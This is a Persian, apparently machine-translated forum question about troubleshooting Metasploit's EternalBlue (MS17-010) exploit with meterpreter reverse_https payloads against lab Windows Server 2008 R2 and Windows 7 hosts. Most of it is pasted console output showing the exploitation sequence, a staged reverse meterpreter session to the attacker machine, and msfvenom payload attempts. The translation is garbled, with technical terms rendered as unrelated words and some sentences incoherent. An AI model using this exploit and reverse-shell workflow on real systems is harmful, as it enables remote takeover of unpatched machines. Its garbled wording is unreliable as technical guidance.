من سعی داشتم با متر متر تمرین کنم ، بنابراین از سرریز ms17_010_eternalblue
و به عنوان payload windows / metpreter / reverse_https
استفاده کردم اما نمی توانم این بار را به درستی کار کنم.
هدف اول: win2008r2 (10.0.0.6)
هدف 2: win7 (10.0.0.7)
هر دو بدون فایروال ، AV ، اتصال LAN (همان آداپتور) به عنوان مهاجم (10.0.0.1) است. [19659002] من تمام گزینه ها را انتخاب کردم (سرگرمی ها ، لیستی ، لپ تاپ …).
در win2008r2 اینگونه است:
[*] هندلر معکوس HTTPS را در https://10.0.0.1:443 شروع کرد.
[*] 10.0.0.6:445 - با استفاده از کمکی / اسکنر / smb / smb_ms17_010 به عنوان چک
[+] 10.0.0.6:445- میزبان احتمالاً برای MS17-010 گسترده است! - Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64 بیتی)
[*] 10.0.0.6:445- 1 از 1 میزبان اسکن شده (100٪ کامل)
[*] 10.0.0.6:445 - اتصال به هدف برای بهره برداری.
[+] 10.0.0.6:445 - ارتباطی برای بهره برداری ایجاد شده است.
[+] 10.0.0.6:445 - سیستم عامل هدف برای سیستم عامل معتبر که توسط پاسخ SMB انتخاب شده است ، انتخاب شده است
[*] 10.0.0.6:445 - دفع بافر خام CORE (51 بایت)
[*] 10.0.0.6:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 10.0.0.6:445 - 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 64 00 00 R2 Standard
[*] 10.0.0.6:445 - 0x00000020 37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 7601 Service Pac
[*] 10.0.0.6:445 - 0x00000030 6b 20 31 k 1
[+] 10.0.0.6:445 - قوس هدف انتخاب شده برای قوس معتبر نشان داده شده توسط پاسخ DCE / RPC
[*] 10.0.0.6:445 - تلاش برای بهره برداری با 12 تخصیص داماد.
[*] 10.0.0.6:445 - ارسال به جز آخرین قطعه بسته سوء استفاده
[*] 10.0.0.6:445 - شروع نظافت استخر بدون صفحه
[+] 10.0.0.6:445 - ارسال بافر SMBv2
[+] 10.0.0.6:445 - بستن اتصال SMBv1 ایجاد سوراخ رایگان مجاور بافر SMBv2.
[*] 10.0.0.6:445 - ارسال بافر نهایی SMBv2.
[*] 10.0.0.6:445 - آخرین قطعه بسته سوء استفاده ارسال می شود!
[*] 10.0.0.6:445 - دریافت پاسخ از بسته سوء استفاده
[+] 10.0.0.6:445 - بازنویسی ETERNALBLUE با موفقیت انجام شد (0xC000000D)!
[*] 10.0.0.6:445 - ارسال تخم مرغ به اتصال خراب.
[*] 10.0.0.6:445 - بدون ایجاد بافر خراب.
[-] 10.0.0.6:445 - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - - = - = - = - = - = - = - = - = - = - =
[-] 10.0.0.6:445 - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = FAIL - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
[-] 10.0.0.6:445 - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - - = - = - = - = - = - = - = - = - = - =
سپس 3 بار در خارج از کشور می رود. میزبان گاهی اوقات راه اندازی مجدد می کند ، گاهی اوقات این کار را نمی کند.
این بهره برداری مشابه را با بارهای دیگر مانند cmd
و reverse_http
امتحان کرد و خوب کار کرد … بنابراین شاید با نصب https چیزی را از دست ندهم.
در win7 ، نتیجه جالب است اما ناامید کننده است:
[*] انتقال دهنده معکوس HTTPS را در https://10.0.0.1:443 شروع کرد
[*] 10.0.0.7:445 - با استفاده از کمکی / اسکنر / smb / smb_ms17_010 به عنوان چک
[+] 10.0.0.7:445- میزبان احتمالاً برای MS17-010 گسترده است! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64 بیتی)
[*] 10.0.0.7:445- 1 از 1 میزبان اسکن شده (100٪ کامل)
[*] 10.0.0.7:445 - اتصال به هدف برای بهره برداری.
[+] 10.0.0.7:445 - ارتباطی برای بهره برداری ایجاد شده است.
[+] 10.0.0.7:445 - سیستم عامل هدف برای سیستم عامل معتبر که توسط پاسخ SMB انتخاب شده است ، انتخاب شده است
[*] 10.0.0.7:445 - دفع بافر خام CORE (38 بایت)
[*] 10.0.0.7:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 10.0.0.7:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 خدمات
[*] 10.0.0.7:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 10.0.0.7:445 - قوس هدف انتخاب شده برای قوس معتبر نشان داده شده توسط پاسخ DCE / RPC
[*] 10.0.0.7:445 - تلاش برای بهره برداری با 12 تخصیص داماد.
[*] 10.0.0.7:445 - ارسال تمام جز آخرین نسخه بسته بهره برداری
[*] 10.0.0.7:445 - شروع نظافت استخر بدون صفحه
[+] 10.0.0.7:445 - ارسال بافر SMBv2
[+] 10.0.0.7:445 - بستن اتصال SMBv1 با ایجاد سوراخ رایگان در مجاورت بافر SMBv2.
[*] 10.0.0.7:445 - ارسال بافر نهایی SMBv2.
[*] 10.0.0.7:445 - آخرین قطعه بسته سوء استفاده ارسال می شود!
[*] 10.0.0.7:445 - دریافت پاسخ از بسته سوء استفاده
[+] 10.0.0.7:445 - بازنویسی ETERNALBLUE با موفقیت انجام شد (0xC000000D)!
[*] 10.0.0.7:445 - ارسال تخم مرغ به اتصال خراب.
[*] 10.0.0.7:445 - بدون ایجاد بافر خراب.
[*] https://10.0.0.1:443 درخواست رسیدگی از 10.0.0.7؛ (UUID: ym6hhk2d) صحنه بندی x64 payload (207449 بایت) ...
[*] جلسه مترجم متر 5 افتتاح شد (10.0.0.1:443 -> 10.0.0.7:2350) در 2020-01-07 14:56:49 -0500
[-] 10.0.0.7:445 - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - - = - = - = - = - = - = - = - = - = - =
[-] 10.0.0.7:445 - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = FAIL - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
[-] 10.0.0.7:445 - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - - = - = - = - = - = - = - = - = - = - =
4 بار ادامه می یابد و ادامه می یابد تا بدون جلسات "کار" به پایان برسد. اینها باعث باز شدن آنها می شود ، اما اگر با آنها ارتباط برقرار کنید ، آنها مرده اند.
همچنین مانند 2008 ، اگر به reverse_tcp تبدیل شده یا http درست کار کنید.
هیچ رمزگذار استفاده نشده است.
هم با x86 و x64 سعی کرد. payloads (در تجربه كوتاهي كه ديدم تطبيق قوس سيستم و payload كمك مي كند اما گاهي …)
همچنين سعي كرد با metrepreter / reverse_winhttps
(به خاطر WinInet و WinHTTP ، اما من نكردم در این مورد عمیق را بخوانید ، بنابراین شاید من آنجا نیز چیزی را از دست ندهم.)
همچنین با msfvenom کار می کردم و بارهای زیادی را برای اجرای این دو سیستم ایجاد می کرد.
نتایج به شرح زیر بود:
در win2008r2 مهم نیست. ، من قادر به ایجاد یک جلسه مترجم بر روی مهاجم نیستم.
exe خوب اجرا می شود ، به مهاجم ارتباط برقرار می کند و حتی در جعبه مهاجم می بینم که چگونه اتصالات را دریافت می کند و پاسخ می دهد (مراحل را باور دارم) ، اما از آنجا که کنترل کننده msfconsole چیزی را گزارش نمی کند ، من گم شده ام).
همان تنظیم با reverse_tcp
و reverse_http
payloads و هر دو خوب کار می کنند ، ایجاد جلسه و همینطور.
در win7 ، در نهایت موفقیت با reverse_https. محموله بارگیری شده با msfvenom به مهاجم متصل می شود و جلسه را ایجاد می کند.
Win7 همچنین با reverse_tcp
و reverse_http
payloads کار می کند. ؟
OS: Linux kali 5.3.0-kali3-amd64 # 1 SMP Debian 5.3.15-1kali1
متاسپلویت
چارچوب: 5.0.66-dev
کنسول: 5.0.66-dev